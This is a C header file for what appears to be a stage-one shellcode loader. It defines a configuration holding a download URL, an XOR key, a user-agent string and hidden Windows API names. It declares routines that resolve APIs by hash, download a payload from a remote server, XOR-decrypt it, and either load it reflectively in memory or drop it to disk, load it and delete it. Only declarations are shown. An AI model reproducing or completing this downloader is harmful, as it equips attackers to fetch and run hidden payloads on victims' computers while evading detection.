src/Shellcode-Stage1/Loader/loader.h
#ifndef _LOADER_H
#define _LOADER_H
#include <Windows.h>
#include "winapi.h"
typedef struct _LOADER_CONFIG
{
DWORD dwMagic;
DWORD dwXorKey;
CHAR strUrl[150];
CHAR strKernel32[9];
CHAR strNtDll[6];
CHAR strWinInet[8];
CHAR strShell32[8];
CHAR strVirtualAlloc[13];
CHAR strVirtualProtect[15];
CHAR strCreateFileW[12];
CHAR strWriteFile[10];
CHAR strCloseHandle[12];
CHAR strGetShortPathNameW[18];
CHAR strGetTempPathW[13];
CHAR strSHGetKnownFolderPath[21];
CHAR strLoadLibraryW[13];
CHAR strFreeLibrary[12];
CHAR strDeleteFileW[12];
CHAR strInternetOpenA[14];
CHAR strInternetOpenUrlA[17];
CHAR strHttpQueryInfoW[15];
CHAR strInternetReadFileExA[20];
CHAR strWtoi[6];
CHAR strExitProcess[12];
CHAR strExportName[9];
CHAR strUserAgent[187];
} LOADER_CONFIG, *PLOADER_CONFIG;
typedef struct _VTABLE
{
PLOADER_CONFIG lpLoaderConfig;
GETPROCADDRESS GetProcAddress;
LOADLIBRARYA LoadLibraryA;
VIRTUALALLOC VirtualAlloc;
VIRTUALPROTECT VirtualProtect;
CREATEFILEW CreateFileW;
WRITEFILE WriteFile;
CLOSEHANDLE CloseHandle;
GETSHORTPATHNAMEW GetShortPathNameW;
GETTEMPPATHW GetTempPathW;
SHGETKNOWNFOLDERPATH SHGetKnownFolderPath;
LOADLIBRARYW LoadLibraryW;
FREELIBRARY FreeLibrary;
DELETEFILEW DeleteFileW;
INTERNETOPENA InternetOpenA;
INTERNETOPENURLA InternetOpenUrlA;
INTERNETREADFILEEXA InternetReadFileExA;
HTTPQUERYINFOW HttpQueryInfoW;
WTOI wtoi;
EXITPROCESS ExitProcess;
} VTABLE, *PVTABLE;
#define CALC_OFFSET(type, ptr, offset) (type) (((ULONG64) ptr) + offset)
#define CALC_OFFSET_DISP(type, base, offset, disp) (type)((DWORD)(base) + (DWORD)(offset) + disp)
#define CALC_DISP(type, offset, ptr) (type) (((ULONG64) offset) - (ULONG64) ptr)
typedef struct base_relocation_block
{
DWORD PageRVA;
DWORD BlockSize;
} base_relocation_block_t;
typedef struct base_relocation_entry
{
WORD offset : 12;
WORD type : 4;
} base_relocation_entry_t;
typedef int (WINAPI *CRTMAIN)(DWORD);
typedef int (WINAPI *CRTMAIN64)(DWORD64);
typedef int (WINAPI *EXPORT)();
typedef int (WINAPI *EXPORT2)(DWORD);
extern "C" VOID Startup();
extern "C" VOID Loader(__in PLOADER_CONFIG lpLoaderConfig);
extern "C" BOOL LoadVTable(__out PVTABLE lpTable);
extern "C" BOOL GetPointers(__out PGETPROCADDRESS fpGetProcAddress, __out PLOADLIBRARYA fpLoadLibraryA, __out PHANDLE pKernel32);
extern "C" HANDLE GetKernel32Handle();
extern "C" DWORD GetStringHash(__in LPVOID lpBuffer, __in BOOL bUnicode, __in UINT uLen);
extern "C" LPBYTE DownloadAndDecrypt(__in PVTABLE lpTable, __in LPSTR strUserAgent, __in LPSTR strUrl, __in LPDWORD dwFileLen, __in DWORD dwXorKey, BOOL bXored);
extern "C" BOOL DownloadFile(__in PVTABLE lpTable, __in HINTERNET hUrl, __in LPBYTE lpBuffer, __in DWORD dwBufferLen);
extern "C" LPBYTE Decrypt(__in LPBYTE lpBuffer, __in DWORD dwBuffLen, __in DWORD dwXorKey);
#ifdef LOAD_FROM_DISK
LPWSTR GetDropPath(__in PVTABLE lpTable);
LPWSTR DropFile(__in PVTABLE lpTable, __in LPBYTE lpFileBuffer, __in DWORD dwFileSize);
#else
extern "C" LPVOID _LoadLibrary(__in PVTABLE lpTable, __in LPVOID lpRawBuffer, __out LPVOID *lpExport);
#endif
// CRT
extern "C" LPVOID __MEMCPY__(__in LPVOID lpDst, __in LPVOID lpSrc, __in DWORD dwCount);
extern "C" VOID __MEMSET__(__in LPVOID p, __in CHAR cValue, __in DWORD dwSize);
#endif